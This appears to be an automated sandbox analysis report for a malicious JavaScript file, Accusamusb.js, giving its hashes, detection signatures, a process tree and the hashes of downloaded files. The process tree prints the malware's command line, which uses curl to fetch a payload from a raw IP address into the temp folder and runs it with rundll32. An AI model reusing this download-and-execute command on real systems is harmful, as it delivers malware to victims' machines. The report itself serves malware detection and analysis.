Analysis
-
max time kernel
121s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20231020-en -
resource tags
arch:x64arch:x86image:win7-20231020-enlocale:en-usos:windows7-x64system -
submitted
31-10-2023 09:42
Static task
static1
Behavioral task
behavioral1
Sample
Accusamusb.js
Resource
win7-20231020-en
Behavioral task
behavioral2
Sample
Accusamusb.js
Resource
win10v2004-20231023-en
General
-
Target
Accusamusb.js
-
Size
110KB
-
MD5
8e2e739c4d82679045abc9913b67d306
-
SHA1
5902e8d5e9c5a31e5198fec86a1070cb413add2b
-
SHA256
6a5c52a0506c17e85b2e86dcaecb33f9d4464fb8ff3ea27b4e1801bd7d6eb12b
-
SHA512
ea36f33ef41fdb0077400f84e176d905076980a0e1d14696f6bbda990f83ae74af965bd57f8bcb3def79196418a2f13b98208bb8e3d0a6cb5fd87a05183c44bf
-
SSDEEP
1536:7r+CP7O9wolzok2Tr0/+AIviC5UDfp1UsNdvb/Qv:ntO967AIaCWDvdvb/U
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 3 996 wscript.exe 5 996 wscript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs ping.exe 1 TTPs 2 IoCs
pid Process 2260 PING.EXE 2240 PING.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 996 wrote to memory of 1444 996 wscript.exe 28 PID 996 wrote to memory of 1444 996 wscript.exe 28 PID 996 wrote to memory of 1444 996 wscript.exe 28 PID 1444 wrote to memory of 2260 1444 cmd.exe 30 PID 1444 wrote to memory of 2260 1444 cmd.exe 30 PID 1444 wrote to memory of 2260 1444 cmd.exe 30 PID 1444 wrote to memory of 2240 1444 cmd.exe 31 PID 1444 wrote to memory of 2240 1444 cmd.exe 31 PID 1444 wrote to memory of 2240 1444 cmd.exe 31 PID 1444 wrote to memory of 2012 1444 cmd.exe 32 PID 1444 wrote to memory of 2012 1444 cmd.exe 32 PID 1444 wrote to memory of 2012 1444 cmd.exe 32
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\Accusamusb.js1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:996 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c LC || echO LC & pInG LC || cUrl http://188.34.192.184/76DKN6/plast -o %TmP%\LC.sct & pInG -n 3 LC || RUNDLL32 %TmP%\LC.sct, Crash & eXit KCqBSVojsBqrwoS2⤵
- Suspicious use of WriteProcessMemory
PID:1444 -
C:\Windows\system32\PING.EXEpInG LC3⤵
- Runs ping.exe
PID:2260
-
-
C:\Windows\system32\PING.EXEpInG -n 3 LC3⤵
- Runs ping.exe
PID:2240
-
-
C:\Windows\system32\rundll32.exeRUNDLL32 C:\Users\Admin\AppData\Local\Temp\LC.sct, Crash3⤵PID:2012
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
61KB
MD5f3441b8572aae8801c04f3060b550443
SHA14ef0a35436125d6821831ef36c28ffaf196cda15
SHA2566720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf
SHA5125ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9
-
Filesize
163KB
MD59441737383d21192400eca82fda910ec
SHA1725e0d606a4fc9ba44aa8ffde65bed15e65367e4
SHA256bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5
SHA5127608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf